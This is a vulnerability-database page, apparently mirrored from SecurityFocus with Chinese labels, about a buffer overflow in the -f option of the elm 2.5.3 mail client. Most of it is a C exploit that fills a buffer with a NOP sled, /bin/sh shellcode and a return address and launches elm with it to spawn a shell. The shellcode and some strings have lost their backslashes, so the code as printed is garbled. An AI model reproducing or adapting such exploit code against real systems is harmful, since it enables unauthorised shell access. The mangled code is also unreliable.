Elm 2.5.3 – Alternative-Folder Buffer Overflow
漏洞ID | 1053516 | 漏洞类型 | |
发布时间 | 2001-02-13 | 更新时间 | 2001-02-13 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/2403/info
There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm.
/***
-------------
elm253-exploit.c
-------------
***/
#include <stdlib.h>
#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64
unsigned long dame_sp() {
__asm__("movl %esp,%eax");
}
void main() {
static char shellcode[]=
/* "x31xc0" */ /* xorl %eax,%eax */
/* "x31xdb" */ /* xorl %ebx,%ebx */
/* "xb0x17" */ /* movb $0x17,%al */
/* "xcdx80" */ /* int $0x80 */
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";
int i=0;
int cont=0;
char buffer[LEN+4];
char kid[6+LEN+4];
printf("-------------------------------------n");
printf("elm buffer overflow exploit by _kiss_n");
printf("-------------------------------------n");
for (i=0;i<=LEN;i+=4)
*(long *) &buffer[i] = RET;
for (i=0;i<LEN-strlen(shellcode)-100;i++)
buffer[i]=NOP;
for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
buffer[i]=shellcode[cont++];
strcpy(kid,"KID=");
strcat(kid,buffer);
putenv(kid);
system("/usr/local/bin/elm -f $KID");
}
相关推荐: Solaris catman Race Condition Vulnerability
Solaris catman Race Condition Vulnerability 漏洞ID 1103618 漏洞类型 Race Condition Error 发布时间 2000-12-18 更新时间 2000-12-18 CVE编号 N/A CNNVD…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666